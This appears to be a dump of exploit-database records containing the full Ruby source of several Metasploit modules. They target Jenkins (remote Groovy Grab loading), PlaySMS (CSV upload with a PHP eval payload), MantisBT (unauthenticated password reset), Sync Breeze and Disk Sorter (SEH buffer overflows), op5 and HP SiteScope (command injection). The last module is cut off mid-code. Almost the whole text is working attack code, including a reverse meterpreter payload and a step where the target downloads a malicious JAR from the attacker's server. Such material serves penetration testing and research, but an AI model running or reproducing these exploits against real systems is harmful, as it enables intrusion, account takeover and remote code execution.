'/org.jenkinsci.plugins.' \\\n 'workflow.cps.CpsFlowDefinition/checkScriptCompile'\n end\n\n normalize_uri(rce_base, rce_uri)\n end\n\n=begin\n http://jenkins.local/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile\n ?value=\n @GrabConfig(disableChecksums=true)%0a\n @GrabResolver(name='orange.tw', root='http://[your_host]/')%0a\n @Grab(group='tw.orange', module='poc', version='1')%0a\n import Orange;\n=end\n def go_go_gadget2\n case target['Type']\n when :unix_memory\n payload_escaped = payload.encoded.gsub(\"'\", \"\\\\'\")\n\n (\n <<~EOF\n class #{app} {\n #{app}() {\n ['sh', '-c', '#{payload_escaped}'].execute()\n }\n }\n EOF\n ).strip\n when :java_dropper\n (\n <<~EOF\n @GrabConfig(disableChecksums=true)\n @GrabResolver('http://#{srvhost_addr}:#{srvport}')\n @Grab('#{vendor}:#{app}:#{version}')\n import #{app}\n EOF\n ).strip\n end\n end\n\n #\n # Payload methods\n #\n\n #\n # If you deviate from the following sequence, you will suffer!\n #\n # HEAD /path/to/pom.xml -> 404\n # HEAD /path/to/payload.jar -> 200\n # GET /path/to/payload.jar -> 200\n #\n def on_request_uri(cli, request)\n vprint_status(\"#{request.method} #{request.uri} requested\")\n\n unless %w[HEAD GET].include?(request.method)\n vprint_error(\"Ignoring #{request.method} request\")\n return\n end\n\n if request.method == 'HEAD'\n if request.uri != payload_uri\n vprint_error('Sending 404')\n return send_not_found(cli)\n end\n\n vprint_good('Sending 200')\n return send_response(cli, '')\n end\n\n if request.uri != payload_uri\n vprint_error('Sending bogus file')\n return send_response(cli, \"#{Faker::Hacker.say_something_smart}\\n\")\n end\n\n vprint_good('Sending payload JAR')\n send_response(\n cli,\n payload_jar,\n 'Content-Type' => 'application/java-archive'\n )\n\n # XXX: $HOME may not work in some cases\n register_dir_for_cleanup(\"$HOME/.groovy/grapes/#{vendor}\")\n end\n\n def payload_jar\n jar = payload.encoded_jar\n\n jar.add_file(\"#{app}.class\", exploit_class)\n jar.add_file(\n 'META-INF/services/org.codehaus.groovy.plugins.Runners',\n \"#{app}\\n\"\n )\n\n jar.pack\n end\n\n=begin javac Exploit.java\n import metasploit.Payload;\n\n public class Exploit {\n public Exploit(){\n try {\n Payload.main(null);\n } catch (Exception e) { }\n\n }\n }\n=end\n def exploit_class\n klass = Rex::Text.decode_base64(\n <<~EOF\n yv66vgAAADMAFQoABQAMCgANAA4HAA8HABAHABEBAAY8aW5pdD4BAAMoKVYB\n AARDb2RlAQANU3RhY2tNYXBUYWJsZQcAEAcADwwABgAHBwASDAATABQBABNq\n YXZhL2xhbmcvRXhjZXB0aW9uAQAHRXhwbG9pdAEAEGphdmEvbGFuZy9PYmpl\n Y3QBABJtZXRhc3Bsb2l0L1BheWxvYWQBAARtYWluAQAWKFtMamF2YS9sYW5n\n L1N0cmluZzspVgAhAAQABQAAAAAAAQABAAYABwABAAgAAAA3AAEAAgAAAA0q\n twABAbgAAqcABEyxAAEABAAIAAsAAwABAAkAAAAQAAL/AAsAAQcACgABBwAL\n AAAA\n EOF\n )\n\n # Replace length-prefixed string \"Exploit\" with a random one\n klass.sub(/.Exploit/, \"#{[app.length].pack('C')}#{app}\")\n end\n\n #\n # Utility methods\n #\n\n def payload_uri\n \"/#{vendor}/#{app}/#{version}/#{app}-#{version}.jar\"\n end\n\n def vendor\n @vendor ||= Faker::App.author.split(/[^[:alpha:]]/).join\n end\n\n def app\n @app ||= Faker::App.name.split(/[^[:alpha:]]/).join\n end\n\n def version\n @version ||= Faker::App.semantic_version\n end\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/jenkins_metaprogramming.rb"}, {"lastseen": "2019-11-11T12:38:36", "bulletinFamily": "exploit", "description": "This module exploits an authenticated file upload remote code excution vulnerability in PlaySMS Version 1.4. This issue is caused by improper file contents handling in import.php (aka the Phonebook import feature). Authenticated Users can upload a CSV file containing a malicious payload via vectors involving the User-Agent HTTP header and PHP code in the User-Agent. This module was tested against PlaySMS 1.4 on VulnHub's Dina 1.0 machine and Windows 7.\n", "modified": "2018-05-07T14:22:21", "published": "2018-05-07T13:25:22", "id": "MSF:EXPLOIT/MULTI/HTTP/PLAYSMS_UPLOADCSV_EXEC", "href": "", "type": "metasploit", "title": "PlaySMS import.php Authenticated CSV File Upload Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PlaySMS import.php Authenticated CSV File Upload Code Execution',\n 'Description' => %q{\n This module exploits an authenticated file upload remote code excution vulnerability\n in PlaySMS Version 1.4. This issue is caused by improper file contents handling in\n import.php (aka the Phonebook import feature). Authenticated Users can upload a CSV\n file containing a malicious payload via vectors involving the User-Agent HTTP header\n and PHP code in the User-Agent.\n This module was tested against PlaySMS 1.4 on VulnHub's Dina 1.0 machine and Windows 7.\n },\n 'Author' =>\n [\n 'Touhid M.Shaikh <touhidshaikh22[at]gmail.com>' # Discoverys and Metasploit Module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE','2017-9101'],\n ['URL','https://www.youtube.com/watch?v=KIB9sKQdEwE'],\n ['EDB','42044']\n ],\n 'DefaultOptions' =>\n {\n 'SSL' => false,\n 'PAYLOAD' => 'php/meterpreter/reverse_tcp',\n 'ENCODER' => 'php/base64',\n },\n 'Privileged' => false,\n 'Platform' => ['php'],\n 'Arch' => ARCH_PHP,\n 'Targets' =>\n [\n [ 'PlaySMS 1.4', { } ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'May 21 2017'))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, \"Base playsms directory path\", '/']),\n OptString.new('USERNAME', [ true, \"Username to authenticate with\", 'admin']),\n OptString.new('PASSWORD', [ true, \"Password to authenticate with\", 'admin'])\n ])\n end\n\n def uri\n return target_uri.path\n end\n\n def check\n begin\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(uri, 'index.php')\n })\n rescue\n vprint_error('Unable to access the index.php file')\n return CheckCode::Unknown\n end\n\n if res.code == 302 && res.headers['Location'].include?('index.php?app=main&inc=core_auth&route=login')\n return Exploit::CheckCode::Appears\n end\n\n return CheckCode::Safe\n end\n\n def login\n res = send_request_cgi({\n 'uri' => normalize_uri(uri, 'index.php'),\n 'method' => 'GET',\n 'vars_get' => {\n 'app' => 'main',\n 'inc' => 'core_auth',\n 'route' => 'login',\n }\n })\n\n # Grabbing CSRF token from body\n /name=\"X-CSRF-Token\" value=\"(?<csrf>[a-z0-9\"]+)\">/ =~ res.body\n fail_with(Failure::UnexpectedReply, \"#{peer} - Could not determine CSRF token\") if csrf.nil?\n vprint_good(\"X-CSRF-Token for login : #{csrf}\")\n\n cookies = res.get_cookies\n vprint_status('Trying to Login ......')\n # Send Creds with cookies.\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(uri, 'index.php'),\n 'cookie' => cookies,\n 'vars_get' => Hash[{\n 'app' => 'main',\n 'inc' => 'core_auth',\n 'route' => 'login',\n 'op' => 'login',\n }.to_a.shuffle],\n 'vars_post' => Hash[{\n 'X-CSRF-Token' => csrf,\n 'username' => datastore['USERNAME'],\n 'password' => datastore['PASSWORD']\n }.to_a.shuffle],\n })\n\n fail_with(Failure::UnexpectedReply, \"#{peer} - Did not respond to Login request\") if res.nil?\n\n # Try to access index page with authenticated cookie.\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(uri, 'index.php'),\n 'cookie' => cookies,\n })\n\n # if we redirect to core_welcome dan we assume we have authenticated cookie.\n if res.code == 302 && res.headers['Location'].include?('index.php?app=main&inc=core_welcome')\n print_good(\"Authentication successful: #{datastore['USERNAME']}:#{datastore['PASSWORD']}\")\n store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])\n return cookies\n else\n fail_with(Failure::UnexpectedReply, \"#{peer} - Authentication Failed :[ #{datastore['USERNAME']}:#{datastore['PASSWORD']} ]\")\n end\n end\n\n\n # Tested successfully on Dina: 1.0.1 machine on vulnhub.\n # Link : https://www.vulnhub.com/entry/dina-101,200/\n def exploit\n\n cookies = login\n\n # Agian CSRF token.\n res = send_request_cgi({\n 'uri' => normalize_uri(uri, 'index.php'),\n 'method' => 'GET',\n 'cookie' => cookies,\n 'vars_get' => Hash[{\n 'app' => 'main',\n 'inc' => 'feature_phonebook',\n 'route' => 'import',\n 'op' => 'list',\n }.to_a.shuffle]\n })\n\n fail_with(Failure::UnexpectedReply, \"#{peer} - Did not respond to Login request\") if res.nil?\n\n # Grabbing CSRF token from body\n /name=\"X-CSRF-Token\" value=\"(?<csrf>[a-z0-9\"]+)\">/ =~ res.body\n fail_with(Failure::UnexpectedReply, \"#{peer} - Could not determine CSRF token\") if csrf.nil?\n vprint_good(\"X-CSRF-Token for upload : #{csrf}\")\n\n # Payload.\n evil = \"<?php $t=$_SERVER['HTTP_USER_AGENT']; eval($t); ?>\"\n #making csv file body\n final_csv = \"Name,Email,Department\\n\"\n final_csv << \"#{evil},#{rand(1..100)},#{rand(1..100)}\"\n # setup POST request.\n post_data = Rex::MIME::Message.new\n post_data.add_part(csrf, content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name=\"X-CSRF-Token\"') # CSRF token\n post_data.add_part(final_csv, content_type = 'text/csv', transfer_encoding = nil, content_disposition = 'form-data; name=\"fnpb\"; filename=\"agent22.csv\"') #payload\n data = post_data.to_s\n\n vprint_status('Trying to upload malicious CSV file ....')\n # Lets Send Upload request.\n res = send_request_cgi({\n 'uri' => normalize_uri(uri, 'index.php'),\n 'method' => 'POST',\n 'agent' => payload.encode,\n 'cookie' => cookies,\n 'vars_get' => Hash[{\n 'app' => 'main',\n 'inc' => 'feature_phonebook',\n 'route' => 'import',\n 'op' => 'import',\n }.to_a.shuffle],\n 'headers' => {\n 'Upgrade-Insecure-Requests' => '1',\n },\n 'Connection' => 'close',\n 'data' => data,\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\n })\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/playsms_uploadcsv_exec.rb"}, {"lastseen": "2019-11-19T00:26:30", "bulletinFamily": "exploit", "description": "MantisBT before 1.3.10, 2.2.4, and 2.3.1 are vulnerable to unauthenticated password reset.\n", "modified": "2017-07-24T13:26:21", "published": "2017-07-09T00:14:21", "id": "MSF:AUXILIARY/ADMIN/HTTP/MANTISBT_PASSWORD_RESET", "href": "", "type": "metasploit", "title": "MantisBT password reset", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MantisBT password reset\",\n 'Description' => %q{\n MantisBT before 1.3.10, 2.2.4, and 2.3.1 are vulnerable to unauthenticated password reset.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'John (hyp3rlinx) Page', # initial discovery\n 'Julien (jvoisin) Voisin' # metasploit module\n ],\n 'References' =>\n [\n ['CVE', '2017-7615'],\n ['EDB', '41890'],\n ['URL', 'https://mantisbt.org/bugs/view.php?id=22690'],\n ['URL', 'http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt']\n ],\n 'Platform' => ['win', 'linux'],\n 'DisclosureDate' => \"Apr 16 2017\"))\n\n register_options(\n [\n OptString.new('USERID', [ true, 'User id to reset', 1]),\n OptString.new('PASSWORD', [ false, 'The new password to set (blank for random)', '']),\n OptString.new('TARGETURI', [ true, 'Relative URI of MantisBT installation', '/'])\n ]\n )\n end\n\n def check\n begin\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, '/login_page.php'),\n 'method'=>'GET'\n })\n\n if res && res.body && res.body.include?('Powered by <a href=\"http://www.mantisbt.org\" title=\"bug tracking software\">MantisBT')\n vprint_status(\"MantisBT detected\")\n return Exploit::CheckCode::Detected\n else\n vprint_status(\"Not a MantisBT Instance!\")\n return Exploit::CheckCode::Safe\n end\n\n rescue Rex::ConnectionRefused\n print_error(\"Connection refused by server.\")\n return Exploit::CheckCode::Safe\n end\n end\n\n def run\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, '/verify.php'),\n 'method' => 'GET',\n 'vars_get' => {\n 'id' => datastore['USERID'],\n 'confirm_hash' => ''\n }\n })\n\n if !res || !res.body\n fail_with(Failure::UnexpectedReply, \"Error in server response. Ensure the server IP is correct.\")\n end\n\n cookie = res.get_cookies\n\n if cookie == '' || !(res.body.include? 'Your account information has been verified.')\n fail_with(Failure::NoAccess, \"Authentication failed\")\n end\n\n\n if datastore['PASSWORD'].blank?\n password = Rex::Text.rand_text_alpha(8)\n else\n password = datastore['PASSWORD']\n end\n\n if res.body =~ /<input type=\"hidden\" name=\"account_update_token\" value=\"([a-zA-Z0-9_-]+)\"/\n token = $1\n else\n fail_with(Failure::UnexpectedReply, 'Could not retrieve account_update_token')\n end\n\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, '/account_update.php'),\n 'method' => 'POST',\n 'vars_post' => {\n 'verify_user_id' => datastore['USERID'],\n 'account_update_token' => $1,\n 'realname' => Rex::Text.rand_text_alpha(rand(5) + 8),\n 'password' => password,\n 'password_confirm' => password\n },\n 'cookie' => cookie\n })\n\n if res && res.body && res.body.include?('Password successfully updated')\n print_good(\"Password successfully changed to '#{password}'.\")\n else\n fail_with(Failure::UnexpectedReply, 'Something went wrong, the password was not changed.')\n end\n end\nend\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/http/mantisbt_password_reset.rb"}, {"lastseen": "2019-11-03T03:06:40", "bulletinFamily": "exploit", "description": "This module exploits a stack-based buffer overflow vulnerability in the web interface of Sync Breeze Enterprise v9.4.28, v10.0.28, and v10.1.16, caused by improper bounds checking of the request in HTTP GET and POST requests sent to the built-in web server. This module has been tested successfully on Windows 7 SP1 x86.\n", "modified": "2018-07-12T22:34:52", "published": "2017-05-17T09:53:28", "id": "MSF:EXPLOIT/WINDOWS/HTTP/SYNCBREEZE_BOF", "href": "", "type": "metasploit", "title": "Sync Breeze Enterprise GET Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Seh\n include Msf::Exploit::Remote::Egghunter\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Sync Breeze Enterprise GET Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack-based buffer overflow vulnerability\n in the web interface of Sync Breeze Enterprise v9.4.28, v10.0.28,\n and v10.1.16, caused by improper bounds checking of the request in\n HTTP GET and POST requests sent to the built-in web server. This\n module has been tested successfully on Windows 7 SP1 x86.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Daniel Teixeira',\n 'Andrew Smith', # MSF support for v10.0.28\n 'Owais Mehtab', # Original v10.0.28 exploit\n 'Milton Valencia (wetw0rk)' # MSF support for v10.1.16\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread'\n },\n 'Platform' => 'win',\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d\\x20\\x26\",\n 'Space' => 500\n },\n 'References' =>\n [\n [ 'CVE', '2017-14980' ],\n ],\n 'Targets' =>\n [\n [\n 'Automatic', {}\n ],\n [ 'Sync Breeze Enterprise v9.4.28',\n {\n 'Offset' => 2488,\n 'Ret' => 0x10015fde # POP # POP # RET [libspp.dll]\n }\n ],\n [ 'Sync Breeze Enterprise v10.0.28',\n {\n 'Offset' => 780,\n 'Ret' => 0x10090c83 # JMP ESP [libspp.dll]\n }\n ],\n [ 'Sync Breeze Enterprise v10.1.16',\n {\n 'Offset' => 2495,\n 'Ret' => 0x1001C65C # POP # POP # RET [libspp.dll]\n }\n ]\n ],\n 'Privileged' => true,\n 'DisclosureDate' => 'Mar 15 2017',\n 'DefaultTarget' => 0))\n end\n\n def get_product_name\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => '/'\n )\n\n if res && res.code == 200\n product_name = res.body.scan(/(Sync Breeze Enterprise v[^<]*)/i).flatten.first\n return product_name if product_name\n end\n\n nil\n end\n\n def check\n product_name = get_product_name\n return Exploit::CheckCode::Unknown unless product_name\n\n if product_name =~ /9\\.4\\.28/ || product_name =~ /10\\.0\\.28/\n return Exploit::CheckCode::Appears\n elsif product_name =~ /Sync Breeze Enterprise/\n return Exploit::CheckCode::Detected\n end\n\n Exploit::CheckCode::Safe\n end\n\n def get_target_name\n if target.name != 'Automatic'\n print_status(\"Target manually set as #{target.name}\")\n return target\n else\n print_status('Automatically detecting target...')\n end\n\n case get_product_name\n when /9\\.4\\.28/\n print_status('Target is 9.4.28')\n return targets[1]\n when /10\\.0\\.28/\n print_status('Target is 10.0.28')\n return targets[2]\n when /10\\.1\\.16/\n print_status('Target is 10.1.16')\n return targets[3]\n else\n nil\n end\n end\n\n def exploit\n tmp_target = target\n case get_target_name\n when targets[1]\n target = targets[1]\n eggoptions = {\n checksum: true,\n eggtag: rand_text_alpha(4, payload_badchars)\n }\n\n hunter, egg = generate_egghunter(\n payload.encoded,\n payload_badchars,\n eggoptions\n )\n\n sploit = rand_text_alpha(target['Offset'])\n sploit << generate_seh_record(target.ret)\n sploit << hunter\n sploit << make_nops(10)\n sploit << egg\n sploit << rand_text_alpha(5500)\n\n print_status('Sending request...')\n\n send_request_cgi(\n 'method' => 'GET',\n 'uri' => sploit\n )\n\n when targets[2]\n target = targets[2]\n uri = \"/login\"\n sploit = rand_text_alpha(target['Offset'])\n sploit << [target.ret].pack('V')\n sploit << rand_text(4)\n make_nops(10)\n sploit << payload.encoded\n\n print_status('Sending request...')\n\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => uri,\n 'vars_post' => {\n 'username' => \"#{sploit}\",\n 'password' => \"rawr\"\n }\n )\n when targets[3]\n target = targets[3]\n\n eggoptions = {\n checksum: true,\n eggtag: rand_text_alpha(4, payload_badchars)\n }\n\n hunter, egg = generate_egghunter(\n payload.encoded,\n payload_badchars,\n eggoptions\n )\n\n sploit = payload.encoded\n sploit << rand_text_alpha(target['Offset'] - payload.encoded.length, payload_badchars)\n sploit << generate_seh_record(target.ret)\n sploit << hunter\n # Push the payload out of this buffer, which will make the hunter look for the payload\n # somewhere else that has the complete payload.\n sploit << make_nops(200)\n sploit << egg\n sploit << rand_text_alpha(9067 - sploit.length, payload_badchars)\n\n send_request_cgi(\n 'uri' => \"/#{sploit}\",\n 'method' => 'GET'\n )\n else\n print_error(\"Exploit not suitable for this target.\")\n end\n ensure\n target = tmp_target\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/syncbreeze_bof.rb"}, {"lastseen": "2019-12-03T16:59:58", "bulletinFamily": "exploit", "description": "This module exploits a stack-based buffer overflow vulnerability in the web interface of Disk Sorter Enterprise v9.5.12, caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on Windows 7 SP1 x86.\n", "modified": "2018-07-12T22:34:52", "published": "2017-04-19T09:57:41", "id": "MSF:EXPLOIT/WINDOWS/HTTP/DISKSORTER_BOF", "href": "", "type": "metasploit", "title": "Disk Sorter Enterprise GET Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Seh\n include Msf::Exploit::Remote::Egghunter\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Disk Sorter Enterprise GET Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack-based buffer overflow vulnerability\n in the web interface of Disk Sorter Enterprise v9.5.12, caused by\n improper bounds checking of the request path in HTTP GET requests\n sent to the built-in web server. This module has been tested\n successfully on Windows 7 SP1 x86.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Daniel Teixeira'\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread'\n },\n 'Platform' => 'win',\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d\\x20\\x26\",\n 'Space' => 500\n },\n 'References' =>\n [\n [ 'CVE', '2017-7230' ]\n ],\n 'Targets' =>\n [\n [ 'Disk Sorter Enterprise v9.5.12',\n {\n 'Offset' => 2488,\n 'Ret' => 0x10051223 # POP # POP # RET [libspp.dll]\n }\n ]\n ],\n 'Privileged' => true,\n 'DisclosureDate' => 'Mar 15 2017',\n 'DefaultTarget' => 0))\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => '/'\n )\n\n if res && res.code == 200\n version = res.body[/Disk Sorter Enterprise v[^<]*/]\n if version\n vprint_status(\"Version detected: #{version}\")\n if version =~ /9\\.5\\.12/\n return Exploit::CheckCode::Appears\n end\n return Exploit::CheckCode::Detected\n end\n else\n vprint_error('Unable to determine due to a HTTP connection timeout')\n return Exploit::CheckCode::Unknown\n end\n\n Exploit::CheckCode::Safe\n end\n\n def exploit\n\n eggoptions = {\n checksum: true,\n eggtag: rand_text_alpha(4, payload_badchars)\n }\n\n hunter, egg = generate_egghunter(\n payload.encoded,\n payload_badchars,\n eggoptions\n )\n\n sploit = rand_text_alpha(target['Offset'])\n sploit << generate_seh_record(target.ret)\n sploit << hunter\n sploit << make_nops(10)\n sploit << egg\n sploit << rand_text_alpha(5500)\n\n print_status('Sending request...')\n\n send_request_cgi(\n 'method' => 'GET',\n 'uri' => sploit\n )\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/disksorter_bof.rb"}, {"lastseen": "2019-12-03T04:47:01", "bulletinFamily": "exploit", "description": "op5 an open source network monitoring software. The configuration page in version 7.1.9 and below allows the ability to test a system command, which can be abused to run arbitrary code as an unpriv user.\n", "modified": "2017-07-24T13:26:21", "published": "2016-06-01T19:07:31", "id": "MSF:EXPLOIT/LINUX/HTTP/OP5_CONFIG_EXEC", "href": "", "type": "metasploit", "title": "op5 v7.1.9 Configuration Command Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n Rank = ExcellentRanking\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'op5 v7.1.9 Configuration Command Execution',\n 'Description' => %q(\n op5 an open source network monitoring software.\n The configuration page in version 7.1.9 and below\n allows the ability to test a system command, which\n can be abused to run arbitrary code as an unpriv user.\n ),\n 'Author' =>\n [\n 'h00die <mike@shorebreaksecurity.com>', # module\n 'hyp3rlinx' # discovery\n ],\n 'References' =>\n [\n [ 'EDB', '39676' ],\n [ 'URL', 'https://www.op5.com/blog/news/op5-monitor-7-2-0-release-notes/']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => ['linux', 'unix'],\n 'Privileged' => false,\n 'DefaultOptions' => { 'SSL' => true },\n 'Targets' =>\n [\n [ 'Automatic Target', {}]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Apr 08 2016'\n )\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [ true, 'User to login with', 'monitor']),\n OptString.new('PASSWORD', [ false, 'Password to login with', 'monitor']),\n OptString.new('TARGETURI', [ true, 'The path to the application', '/'])\n ], self.class\n )\n end\n\n def check\n begin\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path),\n 'method' => 'GET'\n )\n fail_with(Failure::UnexpectedReply, \"#{peer} - Could not connect to web service - no response\") if res.nil?\n /Version: (?<version>[\\d]{1,2}\\.[\\d]{1,2}\\.[\\d]{1,2})[\\s]+\\|/ =~ res.body\n\n if version && Gem::Version.new(version) <= Gem::Version.new('7.1.9')\n vprint_good(\"Version Detected: #{version}\")\n Exploit::CheckCode::Appears\n else\n Exploit::CheckCode::Safe\n end\n rescue ::Rex::ConnectionError\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect to the web service\")\n end\n end\n\n def exploit\n execute_cmdstager(\n :flavor => :echo\n )\n end\n\n def execute_command(cmd, opts)\n begin\n # To manually view the vuln page, click Manage > Configure > Commands.\n # Click the \"Test this command\" button to display the form we abuse.\n\n # login\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, 'monitor/index.php/auth/login'),\n 'method' => 'POST',\n 'vars_get' =>\n {\n 'uri' => 'tac/index'\n },\n 'vars_post' =>\n {\n 'csrf_token' => '',\n 'username' => datastore['USERNAME'],\n 'password' => datastore['PASSWORD']\n }\n )\n\n fail_with(Failure::UnexpectedReply, \"#{peer} - Invalid credentials (response code: #{res.code})\") if res.code != 302\n cookie = res.get_cookies\n # exploit\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, 'monitor/op5/nacoma/command_test.php'),\n 'method' => 'GET',\n 'cookie' => cookie,\n 'vars_get' =>\n {\n 'cmd_str' => cmd\n }\n )\n\n # success means we hang our session, and wont get back a response\n if res\n fail_with(Failure::UnexpectedReply, \"#{peer} - Could not connect to web service - no response\") if res.nil?\n fail_with(Failure::UnexpectedReply, \"#{peer} - Credentials need additional privileges\") if res.body =~ /Access Denied/\n end\n\n rescue ::Rex::ConnectionError\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect to the web service\")\n end\n end\n\n def on_new_session(session)\n super\n session.shell_command_token('setsid $SHELL')\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/op5_config_exec.rb"}, {"lastseen": "2019-11-19T18:26:26", "bulletinFamily": "exploit", "description": "This module exploits a command injection vulnerability discovered in HP SiteScope 11.30 and earlier versions (tested in 11.26 and 11.30). The vulnerability exists in the DNS Tool allowing an attacker to execute arbitrary commands in the context of the service. By default, HP SiteScope installs and runs as SYSTEM in Windows and does not require authentication. This vulnerability only exists on the Windows version. The Linux version is unaffected.\n", "modified": "2017-07-24T13:26:21", "published": "2015-10-09T19:55:48", "id": "MSF:EXPLOIT/WINDOWS/HTTP/HP_SITESCOPE_DNS_TOOL", "href": "", "type": "metasploit", "title": "HP SiteScope DNS Tool Command Injection", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/powershell'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Powershell\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'HP SiteScope DNS Tool Command Injection',\n 'Description' => %q{\n This module exploits a command injection vulnerability\n discovered in HP SiteScope 11.30 and earlier versions (tested in 11.26\n and 11.30). The vulnerability exists in the DNS Tool allowing an\n attacker to execute arbitrary commands in the context of the service. By\n default, HP SiteScope installs and runs as SYSTEM in Windows and does\n not require authentication. This vulnerability only exists on the\n Windows version. The Linux version is unaffected.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Kirk Hayes', # @kirkphayes / Vulnerability Discovery and MSF module author\n 'Charles Riggs', # c0v3rt_chann3l / Vulnerability Discovery\n 'Juan Vazquez' # help with MSF module\n ],\n 'References' =>\n [\n ['URL', 'https://community.rapid7.com/community/metasploit/blog/2015/10/09/r7-2015-17-hp-sitescope-dns-tool-command-injection'],\n ['URL', 'http://www8.hp.com/us/en/software-solutions/sitescope-application-monitoring/index.html'] # vendor site\n ],\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'HP SiteScope 11.30 / Microsoft Windows 7 and higher',\n {\n 'Arch' => [ARCH_X64, ARCH_X86]\n }\n ],\n [ 'HP SiteScope 11.30 / CMD',\n {\n 'Arch' => [ARCH_CMD]\n }\n ]\n ],\n 'Privileged' => false,\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Oct 9 2015'))\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('SITE_SCOPE_USER', [false, 'Username for authentication', '']),\n OptString.new('SITE_SCOPE_PASSWORD', [false, 'Password for authentication', '']),\n OptString.new('TARGETURI', [true, 'Path to SiteScope', '/SiteScope/'])\n ])\n end\n\n def exploit\n initial_session = get_initial_session_id\n redirect = authenticate(initial_session)\n session = get_authenticated_session_id(initial_session, redirect)\n csrf_token = get_csrf_token(session)\n\n print_status(\"Executing payload\")\n random_mark = Rex::Text.rand_text_alpha(5 + rand(5))\n res = send_request_cgi(\n {\n 'uri' => normalize_uri(target_uri.path.to_s, 'remoteProxy'),\n 